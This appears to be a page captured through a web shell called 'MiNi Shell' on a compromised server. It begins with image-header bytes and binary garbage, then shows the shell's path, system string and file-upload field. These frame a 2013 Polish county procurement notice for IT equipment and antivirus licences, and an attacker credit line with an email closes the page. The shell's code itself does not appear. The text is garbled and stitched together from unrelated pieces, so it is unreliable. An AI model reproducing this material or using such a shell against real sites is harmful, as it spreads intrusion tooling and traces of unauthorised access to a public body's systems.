JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130417/151312-N-2013.html

<p class="kh_header"><b>Krotoszyn: Zadanie 1
Dostawa serwera 
Zadanie 2  
Dostawa sprzętu komputerowego dla potrzeb Wydziału Komunikacji i Dróg
Zadanie 3
Dostawa sprzętu komputerowego
Zadanie 4
Dostawa  oprogramowania  antywirusowego
Zadanie 5
Dostawa kolorowego urządzenia wielofunkcyjnego do kopiowania, drukowania  i skanowania.</b><br>
<b>Numer ogłoszenia: 151312 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
Dostawa serwera 
Zadanie 2  
Dostawa sprzętu komputerowego dla potrzeb Wydziału Komunikacji i Dróg
Zadanie 3
Dostawa sprzętu komputerowego
Zadanie 4
Dostawa  oprogramowania  antywirusowego
Zadanie 5
Dostawa kolorowego urządzenia wielofunkcyjnego do kopiowania, drukowania  i skanowania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Dostawa serwera 
Zadanie 2  
Dostawa sprzętu komputerowego dla potrzeb Wydziału Komunikacji i Dróg
Zadanie 3
Dostawa sprzętu komputerowego
Zadanie 4
Dostawa  oprogramowania  antywirusowego
Zadanie 5
Dostawa kolorowego urządzenia wielofunkcyjnego do kopiowania, drukowania  i skanowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.23.13.00-0, 30.21.30.00-5, 30.23.21.10-8, 30.23.33.00-4, 38.52.00.00-6, 48.82.00.00-2, 48.21.93.00-9, 30.12.13.00-6, 48.76.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy  wraz z wypełnionymi załącznikami 1 i lub 2 ilub 3 i lub 4 i lub 5</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat-krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat-krotoszyn.bip.net.pl
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 
                 Dostawa serwera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 
                 Dostawa serwera - 1 szt.
                 Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 1 do SIWZ
                  2.2.1. W  Załączniku Nr 1  podano minimalne parametry wymagań technicznych sprzętu 
                  2.2.2 Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza                                 możliwość     składania ofert równoważnych ale o parametrach technicznych takich                                samych lub lepszych  niż    podane.    Wykonawca składając ofertę musi przedłożyć                                informację   o   proponowanym    produkcie zawierającą  nazwę i parametry                                techniczne   proponowanego   sprzętu.
                   2.2.3   W razie uszkodzenia dysku twardego  objętego gwarancją Wykonawca                                 wymieni  (bezpłatnie)  dysk na nowy,  pozostawiając dotychczasowy u                                 zamawiającego ze względu na   ochronę   danych
                    2.2.4. Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do                                 siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez                                 Zamawiającego.
2.2.5. Po dostarczeniu przedmiotu zamówienia do siedziby Zamawiającego,                                 Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w                                  kolejnych 3 dniach    roboczych od dnia dokonania  dostawy dokona odbioru                                  jakościowego.
2.2.6.   Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy                                 przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura                                 może być  wystawiona dopiero po podpisaniu   protokołu odbioru                               ilościowego i  jakościowego bez zastrzeżeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 
             Dostawa sprzętu komputerowego dla Wydziału Komunikacji i Dróg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 
 Dostawa sprzętu komputerowego dla Wydziału Komunikacji i Dróg.  Komputer - 1 szt., monitor - 1 szt., drukarka laserowa - 1 szt., oprogramowanie      1 szt.,  czytnik kart  inteligentnych - 1 szt., skaner- 1 szt.  Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 2   do SIWZ  Sprzęt wykorzystywany będzie dla systemu SI Kierowca w Wydziale            Komunikacji i Dróg.  Aby zadość uczynić wymogom sprzętowym             programowym oraz zachować procedury bezpieczeństwa systemu ADSxP,      stanowisko komputerowe musi być zgodne ze specyfikacją techniczną             określoną przez Polską Wytwórnię Papierów Wartościowych S.A., opisaną    w  załączniku Nr 2. Powyższe wynika  z obowiązującej umowy na dostawę dokumentów         komunikacyjnych. Zamawiający nie dopuszcza składania ofert na modele inne, niż określone  w specyfikacji technicznej (Załącznik Nr 2 do SIWZ)  Monitor LCD posiadający wadę w postaci uszkodzonych pikseli (min. 1 ) zostanie wymieniony na monitor bez wad w okresie gwarancji. W razie uszkodzenia dysku twardego  objętego gwarancją Wykonawca  wymieni  (bezpłatnie)  dysk na nowy,  pozostawiając dotychczasowy u  zamawiającego ze względu na   ochronę   danych Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt  do siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez  Zamawiającego. Po dostarczeniu przedmiotu zamówienia do siedziby zamawiającego, Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w    kolejnych 3 dniach  roboczych od dnia dokonania  dostawy dokona odbioru   jakościowego.Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy    przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura  może  być  wystawiona dopiero po podpisaniu   protokołu odbioru ilościowego i  jakościowego bez zastrzeżeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.21.93.00-9, 38.52.00.00-6, 30.23.33.00-4, 30.21.30.00-5, 30.23.13.00-0, 30.23.21.10-8, 30.23.60.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 
Dostawa sprzętu i oprogramowania komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 
Dostawa sprzętu i oprogramowania komputerowego
Komputer - 8 szt.,  oprogramowanie - 8 szt.
Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 3   do SIWZ
W  Załącznikach Nr 3  podano minimalne parametry wymagań technicznych sprzętu   i programowania
Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza  możliwość     składania ofert równoważnych ale o parametrach technicznych takich    samych lub lepszych  niż    podane.  Wykonawca składając ofertę musi przedłożyć informację   o   proponowanym    produkcie zawierającą  nazwę i parametry  techniczne   proponowanego   sprzętu. W razie uszkodzenia dysku twardego  objętego gwarancją Wykonawca    wymieni  (bezpłatnie)  dysk na nowy,  pozostawiając dotychczasowy u   zamawiającego ze względu na   ochronę   danych. Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do    siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez Zamawiającego. Po dostarczeniu przedmiotu zamówienia do siedziby Zamawiającego,  Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w       kolejnych 3 dniach    roboczych od dnia dokonania  dostawy dokona odbioru   jakościowego.Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy   przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura   może być  wystawiona dopiero po podpisaniu   protokołu odbioru ilościowego i  jakościowego bez zastrzeżeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 48.21.93.00-9, 30.23.60.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4
Dostawa  oprogramowania  antywirusowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4
Dostawa  oprogramowania  antywirusowego 
ESET NOD 32 BE CLIENT lub  produkt równoważny - 100 licencji Szczegółowy opis  przedmiotu zamówienia zawiera  załączniki Nr 4   do SIWZ Program Antywirusowy ESET NOD32 BE CLIENT  - (ochrona tylko stacji                           roboczych)  100  użytkowników wraz z konsolą administracyjną - wznowienie na  1 rok od dnia wygaśnięcia    dotychczasowych licencji. Termin obowiązywania      licencji upływa w dniu  06.05.2013 r. Zamawiający dopuszcza  produkt równoważny, którego funkcjonalność pokrywa                            się  z  funkcjami ESET NOD 32 BE CLIENT w ilości 100 licencji wraz z konsolą                            administracyjną. Okres obowiązywania licencji - 1 rok   Szczegółowy opis funkcji jakie oprogramowanie winno posiadać zawiera    Załącznik Nr 4 do SIWZ.       W  przypadku rozwiązania równoważnego zamawiający wymaga   przeprowadzenia przez wykonawcę migracji i wdrożenia   oprogramowania (instalacja na wszystkich stanowiskach wskazanych przez     Zamawiającego) oraz przeprowadzenie szkolenia informatyka w zakresie obsługi     oprogramowania. Oprogramowanie winno być utrwalone na nośniku danych. W przypadku zaoferowania produktu równoważnego za datę wywiązania się z    umowy przyjmuje się  dzień wykonania migracji i wdrożenia oprogramowania na  wszystkich komputerach zamawiającego.    W przypadku dostawy programu ESET NOD 32 BE CLIENT za datę  wywiązania się z umowy przyjmuje się datę dostawy oprogramowania do  siedziby Zamawiającego. Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć    oprogramowanie do  siedziby Zamawiającego. Faktura  może być  wystawiona dopiero po podpisaniu   protokołu odbioru    ilościowego i  jakościowego bez zastrzeżeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.76.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5
Dostawa kolorowego urządzenia wielofunkcyjnego do kopiowania, drukowania i skanowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5
Dostawa kolorowego urządzenia wielofunkcyjnego do kopiowania, drukowania i skanowania.Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 5   do SIWZ  Załączniku Nr 5  podano minimalne parametry wymagań technicznych sprzętu. Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza możliwość  składania ofert równoważnych ale o parametrach technicznych takich  samych lub lepszych  niż  podane.    Wykonawca składając ofertę musi  przedłożyć  informację  o   proponowanym produkcie zawierającą nazwę i parametry         techniczne  proponowanego sprzętu. Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do siedziby Zamawiającego, zamontować urządzenie w miejscu wskazanym przez Zamawiającego (siedziba Zamawiającego) oraz uruchomić urządzenie. Urządzenie  musi być  gotowe  do pracy w siedzibie Zamawiającego. Wraz z przedmiotem zamówienia Wykonawca dostarczy również instrukcję    obsługi  urządzenia   w    języku polskim, karty gwarancyjne sprzętu oraz inne dokumenty   wydane dla  użytkownika    sprzętu. Wykonawca zobowiązany jest do przeprowadzeniana na własny koszt  szkolenia  pracowników Zamawiajacego w zakresie prawidłowej obsługi urzadzenia w   siedzibie Zamawiającego - min. 2 godz. Wykonawca udzieli gwarancji na będące przedmiotem zamówienia urządzenia na    okres zgodnie   ze  złożoną ofertą (jednak nie  mniej niż okres okreslony w   wymaganiach technicznych przez  Zamawiajacego)  od dnia protokolarnego    odbioru przedmiotu zamówienia. W okresie gwarancji Wykonawca zapewni bezpłatne wymiany wszystkich   uszkodzonych  lub zużytych części w ramach prawidłowej eksploatacji urządzenia niezbędnych do  prawidłowego  funkcjonowania urządzeń z  wyłączeniem mediów (papier, kalka, folia, toner, bęben itp.). Tzn. Wykonawca    nie będzie pobierał opłat związanych z dojazdami do siedzibyZamawiającego  oraz  nie będzie pobierał opłat  związanych z kosztami pracy serwisu w siedzibie Zamawiajacego; Serwis gwarancyjny obejmie również bezpłatne regulacje urządzenia w otrzymania wysokiej i stałej jakości wydruków i kopii oraz bezpłatny dojazd serwisu. Pożadane jest  aby serwis gwarancyjny oraz serwis pogwarancyjny świadczony   był   przez   osoby  posiadające odpowiedni certyfikat producenta         potwierdzające ich     kwalifikacje do     naprawy urządzenia.   Urządzenie musi być fabrycznie nowe (nie starsze niż z rocznika 2012  tzn.  nie   regenerowane,  nie   instalowane  nigdy wcześniej w żadnym celu, wolne od    wad,  nie  obciążone    prawami osób lub  podmiotów  trzecich. Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy i  uruchomienia  sprzętu w siedzibie Zamawiającego. Faktura  może być   wystawiona dopiero  po    podpisaniu   protokołu odbioru ilościowego i jakościowego bez   zastrzeżeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com